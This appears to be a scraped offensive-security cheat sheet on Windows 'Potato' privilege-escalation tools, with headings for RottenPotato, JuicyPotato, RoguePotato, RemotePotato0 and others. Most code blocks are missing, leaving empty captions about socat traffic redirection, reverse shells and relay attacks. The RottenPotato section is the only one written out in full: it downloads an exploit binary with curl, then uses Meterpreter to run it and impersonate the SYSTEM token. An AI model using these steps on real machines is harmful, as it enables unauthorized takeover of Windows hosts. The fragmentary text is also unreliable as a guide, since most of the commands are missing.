Potatoes

RottenPotato

$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

LonelyPotato

JuicyPotato

RoguePotato

Redirect traffic that comes to 135 port on Attacker (10.10.13.37) with socat back to the Victim (192.168.1.11) on port 9999 (RogueOxidResolver is running locally on port 9999 on Victim):

Trigger the potato to run a binary with high privileges (don't forget to start a listener if sending a reverse shell):

RemotePotato0

Get session ID of the user to pwn:

Hashes collector (modes 2, 3):

Cross-protocol relay (modes 0, 1):

Combining with ESC8:

GenericPotato

EfsPotato

Tools

SweetPotato

MultiPotato

Last updated